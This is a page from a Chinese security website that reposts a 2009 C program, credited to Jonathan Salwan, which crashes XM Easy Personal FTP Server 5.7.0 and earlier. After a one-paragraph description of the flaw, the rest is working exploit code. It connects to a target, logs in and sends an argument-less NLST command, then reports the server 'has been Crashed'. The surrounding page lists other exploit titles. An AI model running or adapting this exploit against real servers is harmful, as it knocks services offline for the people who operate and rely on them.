首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
XM Easy Personal FTP Server <= 5.7.0 (NLST) DoS Exploit
来源:http://www.shell-storm.org 作者:Salwan 发布时间:2009-03-30  

/*
XM Easy Personnal FTP Server <= 5.7.0
Remote Denial of Service with Request (NLST)

---------------------------------------------------------------------------------------------------------
The vulnerability is caused due to an error in handling the NLST command. This can be exploited to crash
the FTP service by sending the "NLST" with NULL argument.
---------------------------------------------------------------------------------------------------------

Author: Jonathan Salwan
Mail  : submit [AT] shell-storm.org
Web   : http://www.shell-storm.org
*/

#include "stdio.h"
#include "unistd.h"
#include "stdlib.h"
#include "sys/types.h"
#include "sys/socket.h"
#include "netinet/in.h"

int syntax(char *file)
 {
 fprintf(stderr,"XM Easy Personnal FTP Server <= 5.7.0\n");
 fprintf(stderr,"=>Syntax  : <%s> <ip> <port> <login> <passwd>\n",file);
 fprintf(stdout,"=>Exemple : %s 127.0.0.1 21 login1 password1\n",file);
 exit(0);
 }

int main(int argc, char **argv)
{
 if (argc < 4)
  syntax(argv[0]);
 
 int port = atoi(argv[2]);

 int mysocket;
 int mysocket2;
 int srv_connect;
 int sockaddr_long;


  struct sockaddr_in sockaddr_mysocket;
  sockaddr_long = sizeof(sockaddr_mysocket);
  sockaddr_mysocket.sin_family = AF_INET;
  sockaddr_mysocket.sin_addr.s_addr = inet_addr(argv[1]);
  sockaddr_mysocket.sin_port = htons(port);

        char request[50];
 char answer[200];

        fprintf(stdout,"[+]Connect to Server %s\n",argv[1]);

                mysocket2 = socket(AF_INET, SOCK_STREAM, 0);
                        if(mysocket2 == -1){
                        fprintf(stderr,"[-]FAILED SOCKET\n");
   return 1;}

 srv_connect = connect(mysocket2, (struct sockaddr*)&sockaddr_mysocket, sockaddr_long);
  
 if (srv_connect != -1)
   { 

                memset(answer,0,200);
         recv(mysocket2,answer,sizeof(answer),0);

  sprintf(request, "USER %s\r\n", argv[3]);  
   if (send(mysocket2,request,strlen(request),0) == -1){
    fprintf(stderr,"[-]Send Request USER\t\t[FAILED]\n");
    shutdown(mysocket2,1);
    return 1;}
   else{
    memset(answer,0,200);
    recv(mysocket2,answer,sizeof(answer),0);
    }
  
  sprintf(request, "PASS %s\r\n", argv[4]);
                  if (send(mysocket2,request,strlen(request),0) == -1){
                          fprintf(stderr,"[-]Send Request PASS\t\t[FAILED]\n");
                          shutdown(mysocket2,1);
                          return 1;}
                  else{
     memset(answer,0,200);
                          recv(mysocket2,answer,sizeof(answer),0);
                   }
                sprintf(request, "NLST\r\n");
                        if (send(mysocket2,request,strlen(request),0) == -1){
                                fprintf(stderr,"[-]Send Request NLST\t\t[FAILED]\n");
                                shutdown(mysocket2,1);
                                return 1;}
   
  }
 else{
  fprintf(stderr,"[-]Connect\t\t[FAILED]\n");
  shutdown(mysocket2,1);
  return 1;}


 shutdown(mysocket2,1);


fprintf(stdout,"[+]Done! %s has been Crashed\n", argv[1]);
return 0;
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PhotoStand 1.2.0 Remote Comman
·FreeSSHd 1.2.1 (rename) Remote
·My Simple Forum 7.1 (LFI) Remo
·Abee Chm Maker 1.9.5 (CMP File
·PHPizabi v0.848b C1 HFP1-3 Rem
·PowerCHM 5.7 (hhp File) Stack
·Mozilla Firefox XSL Parsing Re
·PowerCHM 5.7 (hhp) Local Buffe
·ECShop <= v2.6.2 SQL injection
·glFusion <= 1.1.2 COM_applyFil
·IncrediMail 5.86 (XSS) Script
·pam-krb5 < 3.13 Local Privileg
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved